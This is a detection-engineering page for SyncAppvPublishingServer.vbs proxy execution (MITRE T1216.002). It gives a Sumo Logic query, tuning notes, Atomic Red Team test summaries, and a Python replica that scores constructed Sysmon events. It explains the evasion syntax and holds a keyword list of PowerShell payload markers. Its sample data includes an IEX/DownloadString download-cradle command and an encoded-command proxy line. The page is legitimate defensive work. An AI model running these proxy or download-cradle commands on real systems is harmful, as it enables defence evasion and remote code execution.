Detect SyncAppvPublishingServer in Sumo Logic CSE
Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution of malicious PowerShell commands, bypassing execution restrictions and evading defensive countermeasures. SyncAppvPublishingServer.vbs is a legitimate, Microsoft-signed Visual Basic script associated with Windows Application Virtualization (App-V), located in System32 and commonly executed via wscript.exe. By embedding PowerShell commands in the script's argument using the syntax `SyncAppvPublishingServer.vbs "n; {PowerShell}"`, adversaries can invoke PowerShell logic through a trusted signed host process rather than calling powershell.exe directly. This technique has been observed in DarkHotel APT and BlueNoroff campaigns as a means of evading script-block logging, execution policy restrictions, and process-based detection rules that focus on powershell.exe as the initiating process.
MITRE ATT&CK
- Tactic: Defense Evasion
- Technique: T1216 System Script Proxy Execution
- Sub-technique: T1216.002 SyncAppvPublishingServer
- Canonical reference: https://attack.mitre.org/techniques/T1216/002/
Sumo Detection Query
```
(_sourceCategory=*windows* OR _sourceCategory=*sysmon* OR _sourceCategory=*endpoint*)
| where EventCode = "1" OR EventID = "1"
| eval image_lower = toLowerCase(Image)
| eval cmd_lower = toLowerCase(CommandLine)
| eval parent_image_lower = toLowerCase(ParentImage)
| eval parent_cmd_lower = toLowerCase(ParentCommandLine)
| where (image_lower matches "*wscript.exe"
    OR image_lower matches "*cscript.exe"
    OR image_lower matches "*powershell.exe"
    OR image_lower matches "*pwsh.exe")
  AND (
    cmd_lower matches "*syncappvpublishingserver*"
    OR parent_cmd_lower matches "*syncappvpublishingserver*"
  )
| eval IsSyncAppvDirect = if(
    (image_lower matches "*wscript.exe" OR image_lower matches "*cscript.exe")
    AND cmd_lower matches "*syncappvpublishingserver*",
    1, 0
  )
| eval HasPSPayload = if(
    cmd_lower matches "*invoke-expression*"
    OR cmd_lower matches "*iex(*"
    OR cmd_lower matches "*iex *"
    OR cmd_lower matches "*invoke-webrequest*"
    OR cmd_lower matches "*net.webclient*"
    OR cmd_lower matches "*downloadstring*"
    OR cmd_lower matches "*downloadfile*"
    OR cmd_lower matches "*-encodedcommand*"
    OR cmd_lower matches "*-enc *"
    OR cmd_lower matches "*new-object*"
    OR cmd_lower matches "*start-process*"
    OR cmd_lower matches "*bypass*"
    OR cmd_lower matches "*shellcode*"
    OR cmd_lower matches "*frombase64string*"
    OR cmd_lower matches "*amsiutils*",
    1, 0
  )
| eval IsPSFromSyncAppv = if(
    (image_lower matches "*powershell.exe" OR image_lower matches "*pwsh.exe")
    AND (parent_image_lower matches "*wscript.exe" OR parent_image_lower matches "*cscript.exe")
    AND parent_cmd_lower matches "*syncappvpublishingserver*",
    1, 0
  )
| eval IsUnexpectedParent = if(
    (image_lower matches "*wscript.exe" OR image_lower matches "*cscript.exe")
    AND cmd_lower matches "*syncappvpublishingserver*"
    AND !(parent_image_lower matches "*explorer.exe")
    AND !(parent_image_lower matches "*svchost.exe")
    AND !(parent_image_lower matches "*services.exe")
    AND !(parent_image_lower matches "*winlogon.exe")
    AND !(parent_image_lower matches "*cmd.exe"),
    1, 0
  )
| where IsSyncAppvDirect = 1 OR IsPSFromSyncAppv = 1 OR IsUnexpectedParent = 1
| eval DetectionReason = if(IsPSFromSyncAppv = 1 AND HasPSPayload = 1,
    "PowerShell spawned by SyncAppvPublishingServer proxy with PS payload",
    if(IsSyncAppvDirect = 1 AND HasPSPayload = 1,
      "SyncAppvPublishingServer with embedded PowerShell payload",
      if(IsPSFromSyncAppv = 1,
        "PowerShell spawned by SyncAppvPublishingServer proxy",
        if(IsUnexpectedParent = 1,
          "SyncAppvPublishingServer invoked from unexpected parent",
          "SyncAppv-Generic"))))
| eval RiskScore = if(IsPSFromSyncAppv = 1 AND HasPSPayload = 1, 90,
    if(IsSyncAppvDirect = 1 AND HasPSPayload = 1, 85,
      if(IsPSFromSyncAppv = 1, 75,
        if(IsUnexpectedParent = 1, 60, 50))))
| table _messageTime, Computer, User, Image, CommandLine, ParentImage, ParentCommandLine, DetectionReason, RiskScore
| sort by RiskScore desc, _messageTime desc
```

Detects T1216.002 SyncAppvPublishingServer.vbs abuse by parsing Sysmon Process Create (Event ID 1) events in Sumo Logic. Mirrors the three-branch SPL detection logic: direct SyncAppvPublishingServer invocation with PowerShell payload indicators, PowerShell spawned as a child of wscript/cscript that referenced SyncAppvPublishingServer, and SyncAppvPublishingServer executed from an unexpected parent process. Computes risk scores and detection reasons for analyst triage. Requires Windows Event logs or Sysmon forwarded to Sumo Logic with Image, CommandLine, ParentImage, and ParentCommandLine fields parsed.
False Positives & Tuning
- Legitimate App-V publishing workflows where IT administrators or provisioning agents call SyncAppvPublishingServer.vbs via wscript.exe and the command line includes PowerShell arguments for App-V environment configuration or streaming server registration
- Enterprise MDM or endpoint management systems (SCCM, Tanium, Intune) orchestrating App-V deployment sequences that invoke SyncAppvPublishingServer followed by PowerShell configuration steps as a standard application lifecycle operation
- Developer or QA workstations where App-V packaging toolchains are used alongside PowerShell automation scripts for testing virtualized application packaging and publishing pipelines
Testing Methodology
Validate this detection against 4 Atomic Red Team tests. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1: SyncAppvPublishingServer PowerShell Proxy — Benign Command
Expected signal: Sysmon Event ID 1: wscript.exe with CommandLine containing 'SyncAppvPublishingServer.vbs' and the argument 'n; whoami'. PowerShell ScriptBlock Log Event ID 4104 may capture the proxied command execution depending on the App-V configuration. Security Event ID 4688 (if command line auditing is enabled) for wscript.exe.
- Test 2: SyncAppvPublishingServer PowerShell Proxy — Encoded Command
Expected signal: Sysmon Event ID 1: wscript.exe with CommandLine containing 'SyncAppvPublishingServer.vbs', '-encodedCommand', and the Base64 payload. PowerShell ScriptBlock Log Event ID 4104 capturing the decoded command 'Write-Output Argus-Test-T1216.002'. If PowerShell spawns as a child process, a second Sysmon Event ID 1 for powershell.exe with parent=wscript.exe.
- Test 3: SyncAppvPublishingServer PowerShell Proxy — Download Cradle Simulation
Expected signal: Sysmon Event ID 1: wscript.exe with CommandLine containing 'SyncAppvPublishingServer.vbs', 'Net.WebClient', 'DownloadString', and 'IEX'. Sysmon Event ID 3: network connection attempt to 127.0.0.1:8080 originating from wscript.exe or a child powershell.exe. PowerShell ScriptBlock Log Event ID 4104 capturing the download cradle code.
- Test 4: SyncAppvPublishingServer via cmd.exe — Indirect Invocation
Expected signal: Sysmon Event ID 1 for cmd.exe (from whatever launched the test), then Sysmon Event ID 1 for wscript.exe with ParentImage=cmd.exe and CommandLine containing 'SyncAppvPublishingServer.vbs' and the PowerShell Get-Process command. The parent-child chain cmd.exe -> wscript.exe -> [powershell proxy] is captured.
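To check how the three-branch query above scores the telemetry each of the four tests is expected to produce, here is a Python replica of its logic run over constructed Sysmon Event ID 1 records. This is an added example written for this page, not Sumo Logic's code, the detection package's own tooling, or an Atomic Red Team artifact. The event records, file paths, the loopback URL and the `updater.exe` parent are constructed sample data; the marker lists, parent allow-list, reason strings and risk scores are taken directly from the query.

```python
"""Python replica of the Sumo CSE T1216.002 query, run over constructed Sysmon events."""
import base64

# Marker lists and scores copied from the query; wildcard "*x" becomes endswith, "*x*" becomes "in".
PS_PAYLOAD_MARKERS = (
    "invoke-expression", "iex(", "iex ", "invoke-webrequest", "net.webclient",
    "downloadstring", "downloadfile", "-encodedcommand", "-enc ", "new-object",
    "start-process", "bypass", "shellcode", "frombase64string", "amsiutils",
)
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
PS_HOSTS = ("powershell.exe", "pwsh.exe")
EXPECTED_PARENTS = ("explorer.exe", "svchost.exe", "services.exe", "winlogon.exe", "cmd.exe")


def _ends_with_any(value, names):
    return any(value.endswith(n) for n in names)


def classify(event):
    """Return (DetectionReason, RiskScore) for one Process Create event, or None if it is not a hit."""
    if str(event.get("EventID", event.get("EventCode"))) != "1":
        return None
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "").lower()
    parent_image = event.get("ParentImage", "").lower()
    parent_cmd = event.get("ParentCommandLine", "").lower()

    # Scope filter: a script host or PowerShell host that references the script itself or via its parent.
    if not (_ends_with_any(image, SCRIPT_HOSTS + PS_HOSTS)
            and ("syncappvpublishingserver" in cmd or "syncappvpublishingserver" in parent_cmd)):
        return None

    is_direct = _ends_with_any(image, SCRIPT_HOSTS) and "syncappvpublishingserver" in cmd
    has_payload = any(m in cmd for m in PS_PAYLOAD_MARKERS)
    is_ps_child = (_ends_with_any(image, PS_HOSTS)
                   and _ends_with_any(parent_image, SCRIPT_HOSTS)
                   and "syncappvpublishingserver" in parent_cmd)
    is_unexpected_parent = is_direct and not _ends_with_any(parent_image, EXPECTED_PARENTS)

    if not (is_direct or is_ps_child or is_unexpected_parent):
        return None
    # Same precedence as the nested if() chain in the query.
    if is_ps_child and has_payload:
        return ("PowerShell spawned by SyncAppvPublishingServer proxy with PS payload", 90)
    if is_direct and has_payload:
        return ("SyncAppvPublishingServer with embedded PowerShell payload", 85)
    if is_ps_child:
        return ("PowerShell spawned by SyncAppvPublishingServer proxy", 75)
    if is_unexpected_parent:
        return ("SyncAppvPublishingServer invoked from unexpected parent", 60)
    return ("SyncAppv-Generic", 50)


def run_detection(events):
    """Apply classify() to every event; hits come back sorted by RiskScore descending, like the query."""
    hits = []
    for ev in events:
        result = classify(ev)
        if result is not None:
            reason, score = result
            hits.append({"Image": ev["Image"], "CommandLine": ev["CommandLine"],
                         "DetectionReason": reason, "RiskScore": score})
    hits.sort(key=lambda h: h["RiskScore"], reverse=True)  # stable sort keeps input order on ties
    return hits


# ---- constructed sample telemetry mirroring the four tests' expected signals (not real logs) ----
VBS = r"C:\Windows\System32\SyncAppvPublishingServer.vbs"
WSCRIPT = r"C:\Windows\System32\wscript.exe"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
CMD = r"C:\Windows\System32\cmd.exe"
# Base64 of the UTF-16LE string that Test 2 expects to see decoded in the 4104 log.
ENCODED = base64.b64encode("Write-Output Argus-Test-T1216.002".encode("utf-16-le")).decode()


def _ev(image, cmd, parent_image, parent_cmd):
    return {"EventID": "1", "Image": image, "CommandLine": cmd,
            "ParentImage": parent_image, "ParentCommandLine": parent_cmd}


T2_WSCRIPT_CMD = 'wscript.exe ' + VBS + ' "n; powershell -encodedCommand ' + ENCODED + '"'

SAMPLE_EVENTS = [
    # Test 1: benign command proxied through the script, launched from Explorer
    _ev(WSCRIPT, 'wscript.exe ' + VBS + ' "n; whoami"', EXPLORER, "explorer.exe"),
    # Test 2: encoded command, plus the child powershell.exe the test says may appear
    _ev(WSCRIPT, T2_WSCRIPT_CMD, EXPLORER, "explorer.exe"),
    _ev(POWERSHELL, "powershell.exe -encodedCommand " + ENCODED, WSCRIPT, T2_WSCRIPT_CMD),
    # Test 3: download-cradle simulation against the loopback listener
    _ev(WSCRIPT, 'wscript.exe ' + VBS
        + ' "n; IEX (New-Object Net.WebClient).DownloadString(\'http://127.0.0.1:8080/test.ps1\')"',
        EXPLORER, "explorer.exe"),
    # Test 4: indirect invocation through cmd.exe
    _ev(WSCRIPT, 'wscript.exe ' + VBS + ' "n; Get-Process"', CMD,
        'cmd.exe /c wscript.exe ' + VBS + ' "n; Get-Process"'),
    # Extra: the benign command again, but from a parent outside the query's expected list (constructed)
    _ev(WSCRIPT, 'wscript.exe ' + VBS + ' "n; whoami"',
        r"C:\Users\alice\AppData\Local\Temp\updater.exe", "updater.exe"),
    # Out of scope: ordinary PowerShell with no App-V reference in either command line
    _ev(POWERSHELL, "powershell.exe -Command Get-Date", EXPLORER, "explorer.exe"),
]

if __name__ == "__main__":
    for hit in run_detection(SAMPLE_EVENTS):
        print(hit["RiskScore"], hit["DetectionReason"], "<-", hit["CommandLine"][:72])
```

Running it shows where each test lands: the child powershell.exe from Test 2 scores 90, the wscript.exe events of Tests 2 and 3 score 85, the constructed unexpected-parent case scores 60, and Tests 1 and 4 both fall into the generic 50 branch, because neither `whoami` nor `Get-Process` matches a payload marker and cmd.exe is on the expected-parent list. That generic branch is the one to weigh against the false-positive list above when tuning.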
References (9)
- https://attack.mitre.org/techniques/T1216/002/
- https://lolbas-project.github.io/lolbas/Scripts/Syncappvpublishingserver/
- https://www.trellix.com/en-ca/about/newsroom/stories/research/suspected-darkhotel-apt-activity-update/
- https://securelist.com/bluenoroff-methods-bypass-motw/108383/
- https://strontic.github.io/xcyclopedia/library/SyncAppvPublishingServer.exe-3C291419F60CDF9C2E4E19AD89944FA3.html
- https://x.com/monoxgas/status/895045566090010624
- https://www.hackingarticles.in/indirect-command-execution-defense-evasion-t1202/
- https://learn.microsoft.com/en-us/windows/application-management/app-v/appv-getting-started
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.002/T1216.002.md